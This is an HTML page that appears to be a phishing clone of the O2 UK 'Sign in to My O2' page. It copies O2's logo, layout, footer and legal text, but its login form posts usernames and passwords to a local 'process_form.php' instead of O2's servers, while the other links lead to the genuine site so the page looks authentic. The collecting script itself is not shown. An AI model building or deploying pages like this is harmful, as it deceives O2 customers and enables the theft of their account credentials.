<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>O2 | Accounts | Sign in | View bills, balances, and emails in your My O2 account</title>
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <script src="https://code.jquery.com/jquery-3.6.4.min.js"></script>
    <script src="https://kit.fontawesome.com/2e71d1c020.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="">
    <style>
        body {
            font-family: 'Helvetica', 'Arial', sans-serif;
            margin: 0;
            padding: 0;
            font-size: 14px;
        }

        span,
        a {
            color: #000033;
            text-decoration: none;
        }

        h1 {
            margin: 0px;
            font-size: 46px;
            color: #fff;
            font-weight: 500;
        }

        .container {
            width: 1100px;
            max-width: 100%;
            margin: 0 auto;
            padding: 10px;
        }

        ul {
            list-style-type: none;
            margin: 0px;
            padding: 0px;
        }

        .top-header {
            display: flex;
            flex-direction: row;
            justify-content: normal;
            align-items: center;
            padding: 0px 10px;
        }

        .top-header-item {
            width: 50%;
            display: block;
        }

        .top-header-item:last-child {
            display: flex;
            justify-content: flex-end;
        }

        .top-header-item ul {
            display: flex;
        }

        .top-header-item ul li {
            padding: 10px;
        }

        .top-header-item ul li:first-child {
            text-decoration: underline;
            height: 10px;
        }

        .login-register a,
        .top-header-item ul li a {
            color: #4A4A4A;
        }

        .login-register a:hover,
        .top-header-item ul li a:hover {
            text-decoration: underline;
        }

        /* #0019a5 */
        .main-menu {
            background-color: #0019a5;
        }

        .menu-section {
            display: flex;
            flex-direction: row;
        }

        .menu-item {
            width: 50%;
            display: block;
            display: flex;
            align-items: center;
        }

        .menu-item .brand-logo svg {
            width: 40px;
            height: 40px;
            margin-right: 30px;
        }

        .menu-item ul {
            display: flex;
            align-items: center;
        }

        .menu-item ul li {
            padding: 15px;
            margin-left: 20px;
        }

        .menu-item ul li a {
            color: #fff;
            font-size: 14px;
        }

        .menu-item:last-child {
            justify-content: flex-end;
        }

        .signin-section {
            background: url('https://static.o2.co.uk/mymobile/img/default/page_header_bg.png') right top no-repeat;
            background-size: 100% 100%;
            margin: 0 auto;
            height: 110px;
            display: flex;
            align-items: center;
            margin-top: 1px;
        }

        /* Footer */
        h3 {
            margin: 0px;
        }

        .footer-wrapper {
            background: linear-gradient(180deg, #23236A 0, #107AC0 100%);
            padding: 24px;
        }

        .footer-main {
            display: flex;
        }

        .footer-main h3 {
            font-size: 25px;
            color: #fff;
        }

        .footer-item {
            width: 33.333%;
        }

        .footer-item ul li img {
            width: 32px;
            height: 32px;
        }

        .footer-item ul li {
            display: flex;
            align-items: center;
            padding: 10px;
        }

        .footer-item:nth-child(2) h3 {
            padding: 0px 10px;
            font-weight: 500;
        }

        .footer-item:nth-child(3) ul li,
        .footer-item:nth-child(2) ul li {
            padding: 5px 2px;
        }

        .footer-item:last-child h3 {
            margin-left: 10px;
        }

        .footer-item ul li a {
            margin-left: 10px;
            font-size: 14px;
            color: #fff;
        }

        .footer-social ul {
            display: flex;
        }

        .footer-social ul li {
            margin: 10px;
        }

        .footer-social ul li a img {
            width: 24px;
            height: 24px;
        }

        .footer-menu1 ul {
            display: flex;
            margin: 10px;
        }

        .footer-menu1 ul li {
            border-left: 1px solid #fff;
            display: inline-block;
            margin-left: 5px;
            padding-left: 5px;
            font-size: 12px;
        }

        .footer-menu1 ul li a {
            color: #fff;
        }

        .footer-menu1 ul li:first-child {
            border-left: none;
            margin-left: 0;
            padding-left: 0;
        }

        .footer-menu1 ul li:last-child p {
            margin: 0px;
            margin-left: 40px;
            color: #fff;
        }

        .footer-menu1 p {
            color: #fff;
            margin: 0px 10px;
            font-size: 12px;

        }

        /* Left side bar */
        .content-wrapper {
            background-color: #f8f8f8;
            padding: 20px;
        }

        .main-content {
            display: flex;
        }

        .content-item {
            width: 100%;
        }

        .content-item:first-child {
            width: 60%;
            padding: 20px 30px;
            background-color: #fff;
        }

        .login-wrap {
            width: 100%;
        }

        .login-wrap h2 {
            font-size: 24px;
            font-weight: normal;
            color: #032B5A;
        }

        #loginForm {
            display: flex;
            flex-direction: column;
            justify-content: center;
        }

        #loginForm label {
            color: #032B5A;
        }

        #loginForm input[type="password"],
        #loginForm input[type="text"] {
            width: 100%;
            height: 35px;
            margin-top: 5px;
            border: 1px solid rgb(216, 216, 216);
        }

        #loginForm input[type="submit"] {
            padding: 10px;
            width: 20%;
            border: 0;
            background-color: #d8d8d8;
            border-radius: 5px;
        }

        .rememberMe {
            display: flex;
            align-items: center;
        }

        .rememberMe label {
            margin-left: 10px;
        }

        .login-wrap a {
            margin-top: 30px;
            display: inline-block;
            color: #419EDA;
        }

        .login-wrap a:hover {
            text-decoration: underline;
        }

        .hr-lines {
            position: relative;
            max-width: 500px;
            text-align: center;
            line-height: 26px;
            margin: 16px auto;
            font-size: 16px;
            color: #4A4A4A;
        }

        .hr-lines::before {
            content: " ";
            height: 1px;
            width: 130px;
            display: block;
            position: absolute;
            top: 50%;
            left: 0;
            background: rgb(16, 42, 87);
        }

        .hr-lines::after {
            content: " ";
            height: 1px;
            width: 130px;
            display: block;
            position: absolute;
            top: 50%;
            right: 0;
            background: rgb(16, 42, 87);
        }

        #vmo2Container {
            border-width: 2px;
            border-style: solid;
            border-color: transparent;
            border-image: initial;
            border-radius: 6px;
            background: linear-gradient(to right, rgb(255, 255, 255), rgb(255, 255, 255)) padding-box padding-box, linear-gradient(to right, rgb(247, 0, 0), rgb(8, 30, 171)) border-box border-box;
            padding: 20px;
        }

        #vmo2Container h3 {
            color: rgb(0, 0, 0);
            font-size: 16px;
            font-weight: 700;
            line-height: 24px;
        }

        #vmo2Container p {
            color: rgb(16, 42, 87);
            font-size: 14px;
            line-height: 20px;
        }

        #vmo2Container p a {
            margin: 0px;
        }

        #vmo2Container .align-center {
            text-align: center;
        }

        #vmo2Container a.button {
            color: rgb(255, 255, 255);
            text-align: center;
            line-height: 24px;
            border-radius: 8px;
            background: rgb(0, 25, 165);
            text-decoration: none;
            padding: 8px 32px;
        }

        .content-item:last-child {
            padding: 2rem;
        }

        .content-item:last-child h2 {
            color: rgb(3, 43, 90);
            font-size: 26px;
        }

        .content-item:last-child p {
            padding: 1em 0px;
            color: rgb(3, 43, 90);
        }

        .content-item:last-child a {
            color: rgb(65, 158, 218);
            font-family: Frutiger55, sans-serif;
            font-size: 14px;
        }

        .conntent-inside ul {
            list-style-type: disc;
            color: rgb(3, 43, 90);
            margin-left: 15px;
        }

        .fa-chevron-circle-right {
            margin-right: 10px;
            color: #419EDA;
        }

        .bottom-section {
            margin: 20px 30px;
        }

        .bottom-section h3 {
            color: rgb(3, 43, 90);
            font-size: 22px;
            font-weight: 100;
        }

        .bottom-section p {
            padding-top: 10px;
        }

        #submitButton:not([disabled]) {
            background: linear-gradient(rgb(65, 158, 217) 0px, rgb(63, 153, 213) 17%, rgb(57, 133, 201) 48%, rgb(50, 130, 187) 75%, rgb(47, 124, 180) 100%);
            color: #fff;
            cursor: pointer;
        }

        #submitButton {
            background-color: #4CAF50;
            color: white;
            padding: 10px 20px;
            border: none;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            margin: 4px 2px;
            cursor: pointer;
        }

        .pipe {
            color: rgb(74, 74, 74);
            line-height: 0px;
            margin: 9px 0px 0px;
            overflow: hidden;
            padding: 0px;
        }

        .menu-item:first-child ul li:last-child {
            display: none;
        }

        @media (max-width: 767px) {
            .top-header-item {
                display: none;
            }

            .top-header-item {
                width: 100%;
                padding: 10px 0;
            }

            .menu-item:last-child {
                display: none;
            }

            .menu-item {
                width: 100%;
            }

            .menu-item:first-child ul li:last-child {
                display: block;
            }

            .content-item:first-child {
                width: 100%;
                padding: 0;
            }

            .main-content {
                flex-direction: column;
                padding: 10px;
            }

            .content-wrapper {
                padding: 0;
            }

            #loginForm {
                width: 95%;
            }

            .content-item:last-child {
                padding: 10px;
            }

            .footer-main {
                flex-direction: column;
            }

            .footer-item {
                width: 100%;
            }

            .footer-menu1 ul {
                flex-direction: row;
                flex-wrap: wrap;
                margin: 0 0 10px;
            }

            .footer-menu1 ul li {
                margin-bottom: 5px;
            }

            .footer-menu1 p {
                margin: 0;
            }

            .footer-item ul {
                border-bottom: 2px solid #fff;
                margin-bottom: 10px;
            }

            .content-wrapper {
                background-color: #fff;
            }

            .signin-section .container {
                padding: 0 10px;
            }

            .menu-section {
                padding: 10px;
            }
        }





        /* End of left side bar */
    </style>
</head>

<body>
    <div class="wrapper">
        <header>
            <div class="container">
                <div class="top-header">
                    <div class="top-header-item">
                        <ul>
                            <li>Personal</li>
                            <li class="pipe" aria-hidden="true">|</li>
                            <li><a href="https://o2.co.uk/business">Business</a></li>
                        </ul>
                    </div>
                    <div class="top-header-item">
                        <div class="login-register">
                            <a href="https://accounts.o2.co.uk/signin">Sign in</a>
                            <span>or</span>
                            <a href="https://accounts.o2.co.uk/register">Register</a>
                        </div>
                    </div>
                </div>
            </div>
        </header>

        <div class="main-menu">
            <div class="container">
                <div class="menu-section">
                    <div class="menu-item">
                        <a href="" class="brand-logo">
                            <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
                                width="34px" height="35px" viewBox="0 0 34 35" version="1.1">
                                <!-- Generator: Sketch 49.3 (51167) - http://www.bohemiancoding.com/sketch -->
                                <title>O2 Logo</title>
                                <desc>
                                    Created with Sketch.
                                </desc>
                                <defs>
                                    <polygon id="path-1"
                                        points="0 28.5963489 0 0.0563479784 26.7030678 0.0563479784 26.7030678 28.5963489 3.5407696e-15 28.5963489">
                                    </polygon>
                                </defs>
                                <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
                                    <g id="Artboard">
                                        <g id="o2-logo">
                                            <g id="Group-3" transform="translate(0.000000, 0.100063)">
                                                <mask id="mask-2" fill="white">
                                                    <use xlink:href="#path-1"></use>
                                                </mask>
                                                <g id="Clip-2"></g>
                                                <path
                                                    d="M5.145108,14.3262702 C5.145108,9.14206862 8.18067295,4.11812414 13.3773169,4.11812414 C18.5223346,4.11812414 21.5578996,9.14206862 21.5578996,14.3262702 C21.5578996,19.1898012 19.0369417,24.5344163 13.3773169,24.5344163 C7.66621634,24.5344163 5.145108,19.1898012 5.145108,14.3262702 M-6.02055707e-05,14.3262702 C-6.02055707e-05,22.1294646 5.45381207,28.5963489 13.3773169,28.5963489 C21.249346,28.5963489 26.7030678,22.1294646 26.7030678,14.3262702 C26.7030678,6.04230441 21.352147,0.0563479784 13.3773169,0.0563479784 C5.35086054,0.0563479784 -6.02055707e-05,6.04230441 -6.02055707e-05,14.3262702"
                                                    id="Fill-1" fill="#FFFFFF" mask="url(#mask-2)"></path>
                                            </g>
                                            <path
                                                d="M33.9007041,34.809417 L33.9007041,32.9072819 L29.1563545,32.9072819 C31.0540342,30.9705938 33.5343532,28.6188005 33.5343532,26.0596892 C33.5343532,23.6906976 32.1028152,22.5321557 29.8889058,22.5321557 C28.7067694,22.5321557 27.4916705,22.8432891 26.4428894,23.3966062 L26.6260648,25.4025567 C27.3917292,24.8837926 28.3240125,24.4342908 29.3062664,24.4342908 C30.2549557,24.4342908 31.203946,24.9528986 31.203946,26.0596892 C31.203946,28.2729577 27.2585244,31.6968323 26.1766302,32.7862682 L26.1766302,34.809417 L33.9007041,34.809417 Z"
                                                id="Fill-4" fill="#FFFFFF"></path>
                                        </g>
                                    </g>
                                </g>
                            </svg>
                        </a>
                        <ul>
                            <li><a href="https://o2.co.uk/shop">Shop</a></li>
                            <li><a href="https://o2.co.uk/why-o2">Why O2</a></li>
                            <li><a href="https://o2.co.uk/help">Help</a></li>
                            <li><a href="#"><i class="fas fa-search"></i></a></li>
                        </ul>
                    </div>
                    <div class="menu-item">
                        <ul>
                            <li><a href="https://mymobile.o2.co.uk/">My O2</a></li>
                            <li><a href=""><i class="fas fa-search"></i> Search</a></li>
                            <li><a href="https://o2.co.uk/shop/basket"><i class="fas fa-shopping-basket"></i></a></li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>

        <div class="signin-section">
            <div class="container">
                <h1>Sign In</h1>
            </div>
        </div>

        <section class="content-wrapper">
            <div class="container">
                <div class="main-content">
                    <div class="content-item">
                        <div class="login-wrap">
                            <h2>Sign in to My O2</h2>

                            <form id="loginForm" action="process_form.php" method="post">
                                <label for="username">Username (usually your email address)</label>
                                <input type="text" id="username" name="username" autofocus>

                                <br>

                                <label for="password">Password</label>
                                <input type="password" id="password" name="password">

                                <br>

                                <div class="rememberMe">
                                    <input type="checkbox" id="rememberUsername" name="rememberUsername">
                                    <label for="rememberUsername">Remember my username</label>
                                </div>

                                <br>

                                <input type="submit" id="submitButton" value="Sign in" disabled>
                            </form>
                            <a href="https://accounts.o2.co.uk/resetpassword/selectusername"><i
                                    class="fas fa-chevron-circle-right"></i>Forgotten your username or password?</a>

                            <div class="hr-lines">
                                or
                            </div>
                            <div id="vmo2Container">
                                <h3>Use your Virgin Media O2 ID</h3>
                                <p>If you've linked your Virgin Media and O2 details to create a new Virgin Media O2 ID,
                                    sign in with it here.<span><a
                                            href="https://www.virginmedia.com/support/help/linked-virgin-media-o2-id"
                                            class="">Find out more</a></span></p>
                                <div class="align-center">
                                    <a class="button" href="https://accounts.o2.co.uk/openid/vmo2">Sign in with a Virgin
                                        Media O2 ID</a>
                                </div>
                            </div>
                        </div>

                    </div>
                    <div class="content-item">
                        <h2>Already an O2 customer?</h2>
                        <p>If you've got a Pay Monthly account then we've automatically registered you with My O2 and
                            given you a username and password.</p>
                        <i class="fas fa-chevron-circle-right"></i><a
                            href="https://accounts.o2.co.uk/resetpassword/selectusername">Help me sign in</a>

                        <div class="conntent-inside">
                            <h2>Not yet registered?</h2>
                            <p>If you're a Pay As You Go customer here are just some of the benefits of registering:</p>
                            <ul>
                                <li>Check your usage and remaining balance</li>
                                <li>Set up auto top-ups</li>
                                <li>Manage O2 Rewards</li>
                            </ul>
                            <p>O2 Wifi customer? You can register to manage your account here, whatever network you're
                                on.</p>
                            <i class="fas fa-chevron-circle-right"></i> <a
                                href="https://accounts.o2.co.uk/register">Register now</a>
                        </div>
                    </div>
                </div>
                <div class="bottom-section">
                    <h3>Stay safe</h3>
                    <p> We'll never email or text asking you to send or verify personal, financial or password details.
                        Make
                        sure you keep your details safe and never give them out, even if it looks like the email or text
                        came from
                        us. </p>
                </div>
            </div>
        </section>

        <footer>
            <div class="footer-wrapper">
                <div class="container">
                    <div class="footer-main">
                        <div class="footer-item">
                            <ul>
                                <li>
                                    <img src="/content/find-a-store@2x_0.png" alt="">
                                    <a href="https://stores.o2.co.uk/">Find a store</a>
                                </li>
                                <li>
                                    <img src="/content/check-network@2x_0.png" alt="">
                                    <a href="https://o2.co.uk/coveragechecker">Check our network</a>
                                </li>
                                <li>
                                    <img src="/content/my-o2@2x_0.png" alt="">
                                    <a href="https://accounts.o2.co.uk/auth">Check our network</a>
                                </li>
                                <li>
                                    <img src="/content/track-order@2x.png" alt="">
                                    <a href="https://o2.co.uk/help/pay-monthly/how-to-track-your-order">Track my
                                        order</a>
                                </li>
                                <li>
                                    <img src="/content/search@2x_0.png" alt="">
                                    <a
                                        href="https://o2.co.uk/searchresult?view=html&amp;q1=top&amp;x1=page_type&amp;q=">Search</a>
                                </li>
                            </ul>
                        </div>
                        <div class="footer-item">
                            <h3>Popular in shop</h3>
                            <ul>
                                <li><a href="https://o2.co.uk/shop/apple/iphone-15-pro-max">iPhone 15 Pro Max</a>
                                </li>
                                <li><a href="https://o2.co.uk/shop/apple/iphone-15">iPhone 15</a></li>
                                <li><a href="https://o2.co.uk/shop/apple/watch-series-9-sport-band-41mm">Apple Watch
                                        Series 9</a></li>
                                <li><a href="https://o2.co.uk/shop/apple/watch-ultra-2-titanium-with-trail-loop">Apple
                                        Watch Ultra 2</a></li>
                                <li><a href="https://o2.co.uk/shop/samsung/galaxy-s23-ultra">Samsung Galaxy S23
                                        Ultra</a></li>
                                <li><a href="https://o2.co.uk/shop/samsung/galaxy-s23">Samsung Galaxy S23</a></li>
                                <li><a href="https://o2.co.uk/shop/samsung/galaxy-z-flip5">Samsung Galaxy Z
                                        Flip5</a></li>
                                <li><a href="https://o2.co.uk/shop/google/pixel-8-pro">Google Pixel 8 Pro</a></li>
                                <li><a href="https://o2.co.uk/shop/sim-cards/sim-only-deals">Sim only</a></li>
                                <li><a href="https://virginmedia.com/broadband">Virgin Media broadband deals</a>
                                </li>
                            </ul>
                        </div>
                        <div class="footer-item">
                            <h3>Help and support</h3>
                            <ul>
                                <li><a href="https://o2.co.uk/help">Help home</a>
                                </li>
                                <li><a href="https://o2.co.uk/contactus">Contact us</a></li>
                                <li><a href="https://o2.co.uk/myo2">My O2</a></li>
                                <li><a href="https://o2.co.uk/help/device-and-sim-support/collection-and-delivery">Apple
                                        Collection and delivery</a></li>
                                </li>
                            </ul>
                            <h3>Shop</h3>
                            <ul>
                                <li><a href="https://o2.co.uk/shop/phones">Phones</a>
                                </li>
                                <li><a href="https://o2.co.uk/shop/tablets">Tablets</a></li>
                                <li><a href="https://o2.co.uk/shop/sim-cards/sim-only-deals">Pay Monthly
                                        Sim</a></li>
                                <li><a href="https://o2.co.uk/shop/sim-cards/pay-as-you-go">Pay As
                                        You Go Sim</a></li>
                                </li>
                                <li><a href="https://virginmediao2.co.uk/">Virgin
                                        Media O2 Joint Venture</a></li>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="footer-social">
                        <ul>
                            <li>
                                <a href="https://facebook.com/o2uk">
                                    <img src="/content/facebook@2x_0.png" alt="">
                                </a>
                            </li>
                            <li>
                                <a href="https://youtube.com/user/o2ukofficial">
                                    <img src="/content/youtube@2x_0.png" alt="">
                                </a>
                            </li>
                            <li>
                                <a href="https://twitter.com/o2">
                                    <img src="/content/twitter@2x_0.png" alt="">
                                </a>
                            </li>
                            <li>
                                <a href="https://instagram.com/o2uk/">
                                    <img src="/content/instagram@2x.png" alt="">
                                </a>
                            </li>
                        </ul>
                    </div>
                    <div class="footer-menu1">
                        <ul>
                            <li><a href="https://www.o2.co.uk/abouto2">About O2</a></li>
                            <li><a href="https://www.o2.co.uk/better-connections-plan">Better Connections Plan</a></li>
                            <li><a href="https://o2careers.co.uk/">Careers</a></li>
                            <li><a href="https://news.virginmediao2.co.uk/">News &amp; PR</a></li>
                            <li><a href="https://www.o2.co.uk/sponsorship">Sponsorship</a></li>
                            <li><a href="https://www.o2.co.uk/virgin-media-o2">Virgin Media and O2</a></li>
                        </ul>
                    </div>
                    <div class="footer-menu1">
                        <ul>
                            <li><a href="https://www.o2.co.uk/abouto2">Accessibility</a></li>
                            <li><a href="https://www.o2.co.uk/better-connections-plan">Terms &amp; Conditions</a></li>
                            <li><a href="https://o2careers.co.uk/">Privacy policy</a></li>
                            <li><a href="https://news.virginmediao2.co.uk/">Cookie policy</a></li>
                            <li><a href="https://www.o2.co.uk/sponsorship">Modern Slavery Statement</a></li>
                            <li>
                                <p>© 2023 Telefónica UK Limited</p>
                            </li>
                        </ul>
                        <p>In relation to consumer credit, Telefónica UK Limited is authorised and regulated by the
                            Financial Conduct Authority (Reference Number 718822)</p>
                    </div>
                </div>
            </div>
        </footer>
    </div>

    <script src="" async defer></script>
    <script>
        $(document).ready(function () {
            // Enable submit button only when both username and password fields have data
            $('#username, #password').on('input', function () {
                var username = $('#username').val();
                var password = $('#password').val();

                if (username.trim() !== '' && password.trim() !== '') {
                    $('#submitButton').prop('disabled', false);
                } else {
                    $('#submitButton').prop('disabled', true);
                }
            });
        });
    </script>
</body>

</html>